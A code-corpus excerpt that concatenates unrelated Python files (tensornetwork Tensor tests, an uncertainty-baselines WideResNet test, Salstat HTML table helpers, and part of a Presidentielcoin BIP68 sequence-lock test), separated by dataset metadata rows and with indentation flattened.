dtype = testing_utils.np_dtype_to_backend(backend, dtype)
init = np.zeros(shape, dtype=dtype)
elif backend == "jax":
dtype = testing_utils.np_dtype_to_backend(backend, dtype)
init = jnp.zeros(shape, dtype=dtype)
elif backend == "tensorflow":
dtype = testing_utils.np_dtype_to_backend(backend, dtype)
init = tf.zeros(shape, dtype=dtype)
else:
raise ValueError("Unexpected backend ", backend)
A = tensornetwork.Tensor(init, backend=backend)
assert A.backend.name == backend
np.testing.assert_allclose(A.array, init)
assert A.shape == init.shape
assert A.size == np.prod(init.shape)
assert A.ndim == init.ndim
@pytest.mark.parametrize("dtype", testing_utils.np_all_dtypes)
def test_tensor_dtype(backend, dtype):
""" Checks that Tensor.dtype works.
"""
shape = (2, 3, 1)
A, init = testing_utils.safe_zeros(shape, backend, dtype)
if A is None:
return
if backend != "pytorch":
assert A.dtype == init.dtype
else:
assert A.dtype == torch.tensor(init).dtype
@pytest.mark.parametrize("dtype", testing_utils.np_all_dtypes)
def test_tensor_T(backend, dtype):
""" Checks that Tensor.T works.
"""
shape = (2, 3, 1)
A, init = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
np.testing.assert_allclose(A.T.array, init.T)
@pytest.mark.parametrize("dtype", testing_utils.np_not_bool)
def test_tensor_H(backend, dtype):
""" Checks that Tensor.H works.
"""
shape = (2, 3, 1)
A, init = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
np.testing.assert_allclose(A.H.array, init.conj().T)
@pytest.mark.parametrize("dtype", testing_utils.np_not_bool)
def test_tensor_conj(backend, dtype):
""" Checks that Tensor.conj() works.
"""
shape = (2, 3, 1)
A, init = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
np.testing.assert_allclose(A.conj().array, A.backend.conj(init))
@pytest.mark.parametrize("dtype", testing_utils.np_not_bool)
def test_tensor_conjugate(backend, dtype):
""" Checks that Tensor.conjugate() works.
"""
shape = (2, 3, 1)
A, init = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
np.testing.assert_allclose(A.conjugate().array, A.backend.conj(init))
@pytest.mark.parametrize("dtype", testing_utils.np_all_dtypes)
def test_tensor_copy(backend, dtype):
""" Checks that Tensor.copy() works.
"""
shape = (2, 3, 1)
A, init = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
np.testing.assert_allclose(A.copy().array, init.copy())
@pytest.mark.parametrize("dtype", testing_utils.np_all_dtypes)
def test_tensor_reshape(backend, dtype):
""" Checks that Tensor.copy() works.
"""
shape = (2, 3, 1)
newshape = (6, 1)
A, init = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
np.testing.assert_allclose(A.reshape(newshape).array,
init.reshape(newshape))
@pytest.mark.parametrize("dtype", testing_utils.np_all_dtypes)
def test_tensor_transpose(backend, dtype):
""" Checks that Tensor.transpose() works.
"""
shape = (2, 3, 1)
permutation = (1, 2, 0)
A, init = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
test = A.backend.convert_to_tensor(init)
test = A.backend.transpose(test, perm=permutation)
np.testing.assert_allclose(A.transpose(perm=permutation).array, test)
@pytest.mark.parametrize("dtype", testing_utils.np_all_dtypes)
def test_tensor_squeeze(backend, dtype):
""" Checks that Tensor.squeeze() works.
"""
shape = (2, 3, 1)
A, init = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
np.testing.assert_allclose(A.squeeze().array, init.squeeze())
@pytest.mark.parametrize("dtype", testing_utils.np_all_dtypes)
def test_tensor_ravel(backend, dtype):
""" Checks that Tensor.ravel() works.
"""
shape = (2, 3, 1)
A, init = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
np.testing.assert_allclose(A.ravel().array, init.ravel())
@pytest.mark.parametrize("dtype", testing_utils.np_all_dtypes)
def test_tensor_flatten(backend, dtype):
""" Checks that Tensor.flatten() works.
"""
shape = (2, 3, 1)
A, init = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
np.testing.assert_allclose(A.flatten().array, init.flatten())
@pytest.mark.parametrize("dtype", testing_utils.np_not_bool)
def test_tensor_hconj(backend, dtype):
""" Checks that Tensor.hconj() works.
"""
shape = (2, 3, 1)
permutation = (1, 2, 0)
A, init = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
test = A.backend.convert_to_tensor(init)
test = A.backend.transpose(A.backend.conj(test), perm=permutation)
np.testing.assert_allclose(A.hconj(perm=permutation).array, test)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_multiply(backend, dtype):
""" Checks that Tensor*Tensor works.
"""
shape = (2, 3, 1)
A, initA = testing_utils.safe_randn(shape, backend, dtype)
B, initB = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
testA = A.backend.convert_to_tensor(initA)
testB = B.backend.convert_to_tensor(initB)
result = A * B
result2 = A.backend.multiply(testA, testB)
np.testing.assert_allclose(result.array, result2)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_scalar_multiply(backend, dtype):
""" Checks that Tensor*scalar works.
"""
shape = (2, 3, 1)
A, initA = testing_utils.safe_randn(shape, backend, dtype)
B = 2.
if A is not None:
testA = A.backend.convert_to_tensor(initA)
result = A * B
result2 = A.backend.multiply(testA, B)
np.testing.assert_allclose(result.array, result2)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_scalar_rmultiply(backend, dtype):
""" Checks that scalar*Tensor works.
"""
shape = (2, 3, 1)
A, initA = testing_utils.safe_randn(shape, backend, dtype)
B = 2.
if A is not None:
testA = A.backend.convert_to_tensor(initA)
result = B * A
result2 = A.backend.multiply(B, testA)
np.testing.assert_allclose(result.array, result2)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_divide(backend, dtype):
""" Checks that Tensor/Tensor works.
"""
shape = (2, 3, 1)
A, initA = testing_utils.safe_randn(shape, backend, dtype)
B, _ = testing_utils.safe_zeros(shape, backend, dtype)
if A is not None:
B = B + 1
testA = A.backend.convert_to_tensor(initA)
result = A / B
result2 = A.backend.divide(testA, B.array)
np.testing.assert_allclose(result.array, result2)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_scalar_divide(backend, dtype):
""" Checks that Tensor/scalar works.
"""
shape = (2, 3, 1)
A, initA = testing_utils.safe_randn(shape, backend, dtype)
B = 2.
if A is not None:
testA = A.backend.convert_to_tensor(initA)
result = A / B
result2 = A.backend.divide(testA, B)
np.testing.assert_allclose(result.array, result2)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_addition(backend, dtype):
""" Checks that Tensor+Tensor works.
"""
shape = (2, 3, 1)
A, initA = testing_utils.safe_randn(shape, backend, dtype)
B, initB = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
testA = A.backend.convert_to_tensor(initA)
testB = B.backend.convert_to_tensor(initB)
result = A + B
result2 = A.backend.addition(testA, testB)
np.testing.assert_allclose(result.array, result2)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_scalar_addition(backend, dtype):
""" Checks that Tensor+scalar works.
"""
shape = (2, 3, 1)
A, initA = testing_utils.safe_randn(shape, backend, dtype)
B = 2.
if A is not None:
testA = A.backend.convert_to_tensor(initA)
result = A + B
result2 = A.backend.addition(testA, B)
np.testing.assert_allclose(result.array, result2)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_scalar_raddition(backend, dtype):
""" Checks that scalar+Tensor works.
"""
shape = (2, 3, 1)
A, initA = testing_utils.safe_randn(shape, backend, dtype)
B = 2.
if A is not None:
testA = A.backend.convert_to_tensor(initA)
result = B + A
result2 = A.backend.addition(B, testA)
np.testing.assert_allclose(result.array, result2)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_subtraction(backend, dtype):
""" Checks that Tensor-Tensor works.
"""
shape = (2, 3, 1)
A, initA = testing_utils.safe_randn(shape, backend, dtype)
B, initB = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
testA = A.backend.convert_to_tensor(initA)
testB = B.backend.convert_to_tensor(initB)
result = A - B
result2 = A.backend.subtraction(testA, testB)
np.testing.assert_allclose(result.array, result2)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_scalar_subtraction(backend, dtype):
""" Checks that Tensor-scalar works.
"""
shape = (2, 3, 1)
A, initA = testing_utils.safe_randn(shape, backend, dtype)
B = 2.
if A is not None:
testA = A.backend.convert_to_tensor(initA)
result = A - B
result2 = A.backend.subtraction(testA, B)
np.testing.assert_allclose(result.array, result2)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_scalar_rsubtraction(backend, dtype):
""" Checks that scalar-Tensor works.
"""
shape = (2, 3, 1)
A, initA = testing_utils.safe_randn(shape, backend, dtype)
B = 2.
if A is not None:
testA = A.backend.convert_to_tensor(initA)
result = B - A
result2 = A.backend.subtraction(B, testA)
np.testing.assert_allclose(result.array, result2)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_matmul(backend, dtype):
""" Checks that Tensor@Tensor works.
"""
shape = (3, 3)
A, initA = testing_utils.safe_randn(shape, backend, dtype)
B, initB = testing_utils.safe_randn(shape, backend, dtype)
if A is not None and B is not None:
testA = A.backend.convert_to_tensor(initA)
testB = B.backend.convert_to_tensor(initB)
result = A @ B
result2 = A.backend.matmul(testA, testB)
np.testing.assert_allclose(result.array, result2)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_ops_raise(dtype):
""" Checks that tensor operators raise the right error.
"""
shape = (2, 3, 1)
A, _ = testing_utils.safe_randn(shape, "numpy", dtype)
B, _ = testing_utils.safe_randn(shape, "jax", dtype)
with pytest.raises(ValueError):
_ = A * B
with pytest.raises(ValueError):
_ = A + B
with pytest.raises(ValueError):
_ = A - B
with pytest.raises(ValueError):
_ = A / B
with pytest.raises(ValueError):
_ = A @ B
def test_ncon_builder(backend):
a, _ = testing_utils.safe_randn((2, 2, 2), backend, np.float32)
b, _ = testing_utils.safe_randn((2, 2, 2), backend, np.float32)
c, _ = testing_utils.safe_randn((2, 2, 2), backend, np.float32)
tmp = a(2, 1, -1)
assert tmp.tensors[0] is a
assert tmp.axes[0] == [2, 1, -1]
builder = a(2, 1, -1) @ b(2, 3, -2) @ c(1, 3, -3)
assert builder.tensors == [a, b, c]
assert builder.axes == [[2, 1, -1], [2, 3, -2], [1, 3, -3]]
np.testing.assert_allclose(
ncon_interface.ncon(
[a, b, c],
[[2, 1, -1], [2, 3, -2], [1, 3, -3]],
backend=backend).array,
ncon_interface.finalize(builder).array)
| apache-2.0 | 6,652,985,649,632,117,000 | 32.321918 | 78 | 0.685303 | false |
google/uncertainty-baselines | uncertainty_baselines/models/wide_resnet_condconv_test.py | 1 | 2177 | # coding=utf-8
# Copyright 2021 The Uncertainty Baselines Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for WRN 28-10 with Monte Carlo dropout."""
import tensorflow as tf
import uncertainty_baselines as ub
class WideResnetCondConvTest(tf.test.TestCase):
def testWideResnetCondConv(self):
tf.random.set_seed(83922)
dataset_size = 15
batch_size = 5
input_shape = (32, 32, 1)
num_classes = 2
features = tf.random.normal((dataset_size,) + input_shape)
coeffs = tf.random.normal([tf.reduce_prod(input_shape), num_classes])
net = tf.reshape(features, [dataset_size, -1])
logits = tf.matmul(net, coeffs)
labels = tf.random.categorical(logits, 1)
dataset = tf.data.Dataset.from_tensor_slices((features, labels))
dataset = dataset.repeat().shuffle(dataset_size).batch(batch_size)
model = ub.models.wide_resnet_condconv(
input_shape=input_shape,
depth=10,
width_multiplier=1,
num_classes=num_classes,
l2=0.,
num_experts=5,
per_core_batch_size=batch_size,
use_cond_dense=True,
reduce_dense_outputs=True,
cond_placement='all',
routing_fn='softmax',
normalize_routing=False,
normalize_dense_routing=False,
top_k=-1,
routing_pooling='flatten')
model.compile(
'adam',
loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True))
history = model.fit(
dataset, steps_per_epoch=dataset_size // batch_size, epochs=2)
loss_history = history.history['loss']
self.assertAllGreaterEqual(loss_history, 0.)
if __name__ == '__main__':
tf.test.main()
| apache-2.0 | 8,842,494,253,316,627,000 | 31.984848 | 77 | 0.678916 | false |
salmoni/Salstat | tabler.py | 1 | 7586 | """
tabler.py
Creates tables in HTML for Salstat
Submit a list of [heading: value] pairs in the desired order
p-values are automatically formatted as %1.6f (all other floats as %5.3f?)
The first two routines are generic and for single answer results.
Following are a handful of tabler functions for particular tests
(c) 2013, Alan James Salmoni
"""
def tableANOVAWithin(results):
ln1 = '<table class="table table-striped"><tr>\n'
headhtml = '<tr><th>Variable</th><th>Source</th><th>Sum of squares</th><th>DF</th><th>Mean square</th><th>F</th><th>p</th></tr>\n'
l1vars = ("Name",results["SSbet"],results["DFbet"],results["MSbet"],results["F"],results["p"])
l2vars = (results["SSwit"],results["DFwit"],results["MSwit"])
l3vars = (results["SSres"],results["DFres"],results["MSres"])
l4vars = (results["SSint"])
l5vars = (results["SStot"],results["DFtot"])
line1 = '<tr><td>%s</td><td>Between groups</td><td>%.3f</td><td>%d</td><td>%.3f</td><td>%.3f</td><td>%1.4f</td></tr>\n'%(l1vars)
line2 = '<tr><td></td><td>Within groups</td><td>%.3f</td><td>%d</td><td>%.3f</td><td></td><td></td></tr>\n'%(l2vars)
line3 = '<tr><td></td><td>Residual</td><td>%.3f</td><td>%d</td><td>%.3f</td><td></td><td></td></tr>\n'%(l3vars)
line4 = '<tr><td></td><td>Interaction</td><td>%.3f</td><td></td><td></td><td></td><td></td></tr>\n'%(l4vars)
line5 = '<tr><td></td><td>Total</td><td>%.3f</td><td>%d</td><td></td><td></td><td></td></tr>\n'%(l5vars)
line = ln1+headhtml+line1+line3+line4+line2+line5+'</table>'
return line
def tableANOVABetween(results):
ln1 = '<table class="table table-striped"><tr>\n'
headhtml = '<tr><th>Variable</th><th>Source</th><th>Sum of squares</th><th>DF</th><th>Mean square</th><th>F</th><th>p</th></tr>\n'
l1vars = ("Name",results["SSbet"],results["DFbet"],results["MSbet"],results["F"],results["p"])
l2vars = (results["SSwit"],results["DFerr"],results["MSerr"])
l3vars = (results["SStot"],results["DFtot"])
line1 = '<tr><td>%s</td><td>Between groups</td><td>%.3f</td><td>%d</td><td>%.3f</td><td>%.3f</td><td>%1.4f</td></tr>\n'%(l1vars)
line2 = '<tr><td></td><td>Within groups</td><td>%.3f</td><td>%d</td><td>%.3f</td></tr>\n'%(l2vars)
line3 = '<tr><td></td><td>Total</td><td>%.3f</td><td>%d</td></tr>\n'%(l3vars)
line = ln1+headhtml+line1+line2+line3+'</table>'
return line
def table(ListofLists):
ln1 = '<table class="table table-striped"><tr>'
ln2 = '<tr>'
for List in ListofLists:
key = List[0]
val = List[1]
headhtml = '<th>%s</th>'%key
if key == 'p':
try:
foothtml = '<td>%1.6f</td>'%val
except TypeError:
foothtml = '<td>n/a</td>'
elif type(val) is int:
foothtml = '<td>%d</td>'%val
elif (type(val) is str):
foothtml = '<td>%s</td>'%val
#elif type(val) is float:
else:
fltstr = str(val)
foothtml = '<td>%s</td>'%fltstr
# really need to figure out what parameters make a good display for each number
ln1 = ln1 + headhtml
ln2 = ln2 + foothtml
ln1 = ln1 + '</tr>' + ln2 + '</tr>\n</table>\n'
return ln1
def vtable(List):
key = List[0]
vals = List[1:]
btn_id = ' id="%s"'%key
chartbutton = '<a class="btn btn-mini dropdown-toggle"%s data-toggle="dropdown" \
href="#">Chart</a>\n'%btn_id
linehtml = '<tr><td>%s</td>'%(key)
for val in vals:
if key == 'p':
try:
linehtml = '<td>%1.6f</td>'%val
except TypeError:
linehtml = '<td>n/a</td>'
elif type(val) is int:
linehtml = linehtml + '<td>%d</td>'%val
elif (type(val) is str):
linehtml = linehtml + '<td>%s</td>'%val
elif type(val) is float:
linehtml = linehtml + '<td>%s</td>'%str(val)
elif type(val) is tuple:
print ("TUPLE!", val)
else:
try:
linehtml = linehtml + '<td>%s</td>'%str(val)
except:
pass
linehtml = linehtml + '</tr>\n'
return linehtml
def tableHinges(List):
key = List[0]
vals = List[1:]
linehtml = '<tr><td>%s</td>'%(key)
for val in vals:
linehtml += '<td>%s, %s</td>'%(str(val[0]), str(val[1]))
linehtml += '</tr>\n'
return linehtml
def tableMultiples(vals, varName):
table = '<h3>%s</h3><table class="table table-striped">\n'%varName
table += '\t<tr><th>Value</th>'
try:
if vals['freqs']:
table += '<th>Frequencies</th>'
except ValueError:
table += '<th>Frequencies</th>'
try:
if vals['props']:
table += '<th>Proportions</th>'
except ValueError:
table += '<th>Proportions</th>'
try:
if vals['percs']:
table += '<th>Percentages</th>'
except ValueError:
table += '<th>Percentages</th>'
table += '</tr>\n'
N = len(vals['values'])
for idx in range(N):
table += '\t<tr><td>%s</td>'%vals['values'][idx]
try:
if vals['freqs']:
table += '<td>%s</td>'%vals['freqs'][idx]
except ValueError:
table += '<td>%s</td>'%vals['freqs'][idx]
try:
if vals['props']:
table += '<td>%s</td>'%vals['props'][idx]
except ValueError:
table += '<td>%s</td>'%vals['props'][idx]
try:
if vals['percs']:
table += '<td>%s %%</td>'%vals['percs'][idx]
except ValueError:
table += '<td>%s %%</td>'%vals['percs'][idx]
table += '</tr>\n'
table += '</table>\n'
return table
def tableFrequencies(List):
table = '<table class="table table-striped">\n'
table += '\t<tr><th>Value</th><th>Frequency</th></tr>\n'
for var in List:
values = var[0]
freqs = var[1]
table += '<table class="table table-striped">\n'
table += '\t<tr><th>Value</th><th>Frequency</th></tr>\n'
for idx, row in enumerate(values):
table += '\t<tr><td>%s</td><td>%s</td></tr>\n'%(str(row),str(freqs[idx]))
table += '</table>\n'
return table
def tableProportions(List):
"""
Passes two arrays in a list:
array 1 = value
array 2 = corresponding proportions
"""
table = ''
for turn in List:
vals = turn[0]
props = turn[1]
table += '<table class="table table-striped">\n'
table += '\t<tr><th>Value</th><th>Proportion</th></tr>\n'
for idx, val in enumerate(vals):
table += '\t<tr><td>%s</td><td>%s</td></tr>\n'%(str(val),str(props[idx]))
table += '</table>\n'
return table
def tableMode(List):
"""
Produces a table to display modes.
Passed are two arrays:
1 = frequency
2 = modal values
"""
table = '<h3>Mode</h3>\n<table class="table table-striped">\n'
table += '\t<tr><th>Frequency</th><th>Modal values</th></tr>\n'
for turn in List:
freq = turn[0]
vals = turn[1]
table += '\t<tr><td>%s</td><td>%s<br />'%(str(freq), str(vals[0]))
for idx in range(1, len(vals)):
table += '\t%s<br />\n'%(str(vals[idx]))
table += '</td></tr>\n\t<tr><td></td><td></td></tr>\n'
table += '</table>\n'
return table
if __name__ == '__main__':
a1 = ['Variable 1','Var001']
a2 = ['Variable 2','Var002']
a3 = ['df',99]
a4 = ['t',30.0001]
a5 = ['p',0.003]
a = [a1,a2,a3,a4,a5]
print (table(a))
| gpl-2.0 | 5,365,793,006,503,404,000 | 36.004878 | 134 | 0.521355 | false |
presidentielcoin/presidentielcoin | qa/rpc-tests/bip68-sequence.py | 1 | 18409 | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Presidentielcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test BIP68 implementation
#
from test_framework.test_framework import PresidentielcoinTestFramework
from test_framework.util import *
from test_framework.script import *
from test_framework.mininode import *
from test_framework.blocktools import *
SEQUENCE_LOCKTIME_DISABLE_FLAG = (1<<31)
SEQUENCE_LOCKTIME_TYPE_FLAG = (1<<22) # this means use time (0 means height)
SEQUENCE_LOCKTIME_GRANULARITY = 9 # this is a bit-shift
SEQUENCE_LOCKTIME_MASK = 0x0000ffff
# RPC error for non-BIP68 final transactions
NOT_FINAL_ERROR = "64: non-BIP68-final"
class BIP68Test(PresidentielcoinTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 2
self.setup_clean_chain = False
def setup_network(self):
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, ["-debug", "-blockprioritysize=0"]))
self.nodes.append(start_node(1, self.options.tmpdir, ["-debug", "-blockprioritysize=0", "-acceptnonstdtxn=0"]))
self.is_network_split = False
self.relayfee = self.nodes[0].getnetworkinfo()["relayfee"]
connect_nodes(self.nodes[0], 1)
def run_test(self):
# Generate some coins
self.nodes[0].generate(110)
print("Running test disable flag")
self.test_disable_flag()
print("Running test sequence-lock-confirmed-inputs")
self.test_sequence_lock_confirmed_inputs()
print("Running test sequence-lock-unconfirmed-inputs")
self.test_sequence_lock_unconfirmed_inputs()
print("Running test BIP68 not consensus before versionbits activation")
self.test_bip68_not_consensus()
print("Verifying nVersion=2 transactions aren't standard")
self.test_version2_relay(before_activation=True)
print("Activating BIP68 (and 112/113)")
self.activateCSV()
print("Verifying nVersion=2 transactions are now standard")
self.test_version2_relay(before_activation=False)
print("Passed\n")
# Test that BIP68 is not in effect if tx version is 1, or if
# the first sequence bit is set.
def test_disable_flag(self):
# Create some unconfirmed inputs
new_addr = self.nodes[0].getnewaddress()
self.nodes[0].sendtoaddress(new_addr, 2) # send 2 PRC
utxos = self.nodes[0].listunspent(0, 0)
assert(len(utxos) > 0)
utxo = utxos[0]
tx1 = CTransaction()
value = int(satoshi_round(utxo["amount"] - self.relayfee)*COIN)
# Check that the disable flag disables relative locktime.
# If sequence locks were used, this would require 1 block for the
# input to mature.
sequence_value = SEQUENCE_LOCKTIME_DISABLE_FLAG | 1
tx1.vin = [CTxIn(COutPoint(int(utxo["txid"], 16), utxo["vout"]), nSequence=sequence_value)]
tx1.vout = [CTxOut(value, CScript([b'a']))]
tx1_signed = self.nodes[0].signrawtransaction(ToHex(tx1))["hex"]
tx1_id = self.nodes[0].sendrawtransaction(tx1_signed)
tx1_id = int(tx1_id, 16)
# This transaction will enable sequence-locks, so this transaction should
# fail
tx2 = CTransaction()
tx2.nVersion = 2
sequence_value = sequence_value & 0x7fffffff
tx2.vin = [CTxIn(COutPoint(tx1_id, 0), nSequence=sequence_value)]
tx2.vout = [CTxOut(int(value-self.relayfee*COIN), CScript([b'a']))]
tx2.rehash()
try:
self.nodes[0].sendrawtransaction(ToHex(tx2))
except JSONRPCException as exp:
assert_equal(exp.error["message"], NOT_FINAL_ERROR)
else:
assert(False)
# Setting the version back down to 1 should disable the sequence lock,
# so this should be accepted.
tx2.nVersion = 1
self.nodes[0].sendrawtransaction(ToHex(tx2))
# Calculate the median time past of a prior block ("confirmations" before
# the current tip).
def get_median_time_past(self, confirmations):
block_hash = self.nodes[0].getblockhash(self.nodes[0].getblockcount()-confirmations)
return self.nodes[0].getblockheader(block_hash)["mediantime"]
# Test that sequence locks are respected for transactions spending confirmed inputs.
def test_sequence_lock_confirmed_inputs(self):
# Create lots of confirmed utxos, and use them to generate lots of random
# transactions.
max_outputs = 50
addresses = []
while len(addresses) < max_outputs:
addresses.append(self.nodes[0].getnewaddress())
while len(self.nodes[0].listunspent()) < 200:
import random
random.shuffle(addresses)
num_outputs = random.randint(1, max_outputs)
outputs = {}
for i in range(num_outputs):
outputs[addresses[i]] = random.randint(1, 20)*0.01
self.nodes[0].sendmany("", outputs)
self.nodes[0].generate(1)
utxos = self.nodes[0].listunspent()
# Try creating a lot of random transactions.
# Each time, choose a random number of inputs, and randomly set
# some of those inputs to be sequence locked (and randomly choose
# between height/time locking). Small random chance of making the locks
# all pass.
for i in range(400):
# Randomly choose up to 10 inputs
num_inputs = random.randint(1, 10)
random.shuffle(utxos)
# Track whether any sequence locks used should fail
should_pass = True
# Track whether this transaction was built with sequence locks
using_sequence_locks = False
tx = CTransaction()
tx.nVersion = 2
value = 0
for j in range(num_inputs):
sequence_value = 0xfffffffe # this disables sequence locks
# 50% chance we enable sequence locks
if random.randint(0,1):
using_sequence_locks = True
# 10% of the time, make the input sequence value pass
input_will_pass = (random.randint(1,10) == 1)
sequence_value = utxos[j]["confirmations"]
if not input_will_pass:
sequence_value += 1
should_pass = False
# Figure out what the median-time-past was for the confirmed input
# Note that if an input has N confirmations, we're going back N blocks
# from the tip so that we're looking up MTP of the block
# PRIOR to the one the input appears in, as per the BIP68 spec.
orig_time = self.get_median_time_past(utxos[j]["confirmations"])
cur_time = self.get_median_time_past(0) # MTP of the tip
# can only timelock this input if it's not too old -- otherwise use height
can_time_lock = True
if ((cur_time - orig_time) >> SEQUENCE_LOCKTIME_GRANULARITY) >= SEQUENCE_LOCKTIME_MASK:
can_time_lock = False
# if time-lockable, then 50% chance we make this a time lock
if random.randint(0,1) and can_time_lock:
# Find first time-lock value that fails, or latest one that succeeds
time_delta = sequence_value << SEQUENCE_LOCKTIME_GRANULARITY
if input_will_pass and time_delta > cur_time - orig_time:
sequence_value = ((cur_time - orig_time) >> SEQUENCE_LOCKTIME_GRANULARITY)
elif (not input_will_pass and time_delta <= cur_time - orig_time):
sequence_value = ((cur_time - orig_time) >> SEQUENCE_LOCKTIME_GRANULARITY)+1
sequence_value |= SEQUENCE_LOCKTIME_TYPE_FLAG
tx.vin.append(CTxIn(COutPoint(int(utxos[j]["txid"], 16), utxos[j]["vout"]), nSequence=sequence_value))
value += utxos[j]["amount"]*COIN
# Overestimate the size of the tx - signatures should be less than 120 bytes, and leave 50 for the output
tx_size = len(ToHex(tx))//2 + 120*num_inputs + 50
tx.vout.append(CTxOut(int(value-self.relayfee*tx_size*COIN/1000), CScript([b'a'])))
rawtx = self.nodes[0].signrawtransaction(ToHex(tx))["hex"]
try:
self.nodes[0].sendrawtransaction(rawtx)
except JSONRPCException as exp:
assert(not should_pass and using_sequence_locks)
assert_equal(exp.error["message"], NOT_FINAL_ERROR)
else:
assert(should_pass or not using_sequence_locks)
# Recalculate utxos if we successfully sent the transaction
utxos = self.nodes[0].listunspent()
# Test that sequence locks on unconfirmed inputs must have nSequence
# height or time of 0 to be accepted.
# Then test that BIP68-invalid transactions are removed from the mempool
# after a reorg.
def test_sequence_lock_unconfirmed_inputs(self):
# Store height so we can easily reset the chain at the end of the test
cur_height = self.nodes[0].getblockcount()
# Create a mempool tx.
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 2)
tx1 = FromHex(CTransaction(), self.nodes[0].getrawtransaction(txid))
tx1.rehash()
# Anyone-can-spend mempool tx.
# Sequence lock of 0 should pass.
tx2 = CTransaction()
tx2.nVersion = 2
tx2.vin = [CTxIn(COutPoint(tx1.sha256, 0), nSequence=0)]
tx2.vout = [CTxOut(int(tx1.vout[0].nValue - self.relayfee*COIN), CScript([b'a']))]
tx2_raw = self.nodes[0].signrawtransaction(ToHex(tx2))["hex"]
tx2 = FromHex(tx2, tx2_raw)
tx2.rehash()
self.nodes[0].sendrawtransaction(tx2_raw)
# Create a spend of the 0th output of orig_tx with a sequence lock
# of 1, and test what happens when submitting.
# orig_tx.vout[0] must be an anyone-can-spend output
def test_nonzero_locks(orig_tx, node, relayfee, use_height_lock):
sequence_value = 1
if not use_height_lock:
sequence_value |= SEQUENCE_LOCKTIME_TYPE_FLAG
tx = CTransaction()
tx.nVersion = 2
tx.vin = [CTxIn(COutPoint(orig_tx.sha256, 0), nSequence=sequence_value)]
tx.vout = [CTxOut(int(orig_tx.vout[0].nValue - relayfee*COIN), CScript([b'a']))]
tx.rehash()
try:
node.sendrawtransaction(ToHex(tx))
except JSONRPCException as exp:
assert_equal(exp.error["message"], NOT_FINAL_ERROR)
assert(orig_tx.hash in node.getrawmempool())
else:
# orig_tx must not be in mempool
assert(orig_tx.hash not in node.getrawmempool())
return tx
test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=True)
test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=False)
# Now mine some blocks, but make sure tx2 doesn't get mined.
# Use prioritisetransaction to lower the effective feerate to 0
self.nodes[0].prioritisetransaction(tx2.hash, -1e15, int(-self.relayfee*COIN))
cur_time = int(time.time())
for i in range(10):
self.nodes[0].setmocktime(cur_time + 600)
self.nodes[0].generate(1)
cur_time += 600
assert(tx2.hash in self.nodes[0].getrawmempool())
test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=True)
test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=False)
# Mine tx2, and then try again
self.nodes[0].prioritisetransaction(tx2.hash, 1e15, int(self.relayfee*COIN))
# Advance the time on the node so that we can test timelocks
self.nodes[0].setmocktime(cur_time+600)
self.nodes[0].generate(1)
assert(tx2.hash not in self.nodes[0].getrawmempool())
# Now that tx2 is not in the mempool, a sequence locked spend should
# succeed
tx3 = test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=False)
assert(tx3.hash in self.nodes[0].getrawmempool())
self.nodes[0].generate(1)
assert(tx3.hash not in self.nodes[0].getrawmempool())
# One more test, this time using height locks
tx4 = test_nonzero_locks(tx3, self.nodes[0], self.relayfee, use_height_lock=True)
assert(tx4.hash in self.nodes[0].getrawmempool())
# Now try combining confirmed and unconfirmed inputs
tx5 = test_nonzero_locks(tx4, self.nodes[0], self.relayfee, use_height_lock=True)
assert(tx5.hash not in self.nodes[0].getrawmempool())
utxos = self.nodes[0].listunspent()
tx5.vin.append(CTxIn(COutPoint(int(utxos[0]["txid"], 16), utxos[0]["vout"]), nSequence=1))
tx5.vout[0].nValue += int(utxos[0]["amount"]*COIN)
raw_tx5 = self.nodes[0].signrawtransaction(ToHex(tx5))["hex"]
try:
self.nodes[0].sendrawtransaction(raw_tx5)
except JSONRPCException as exp:
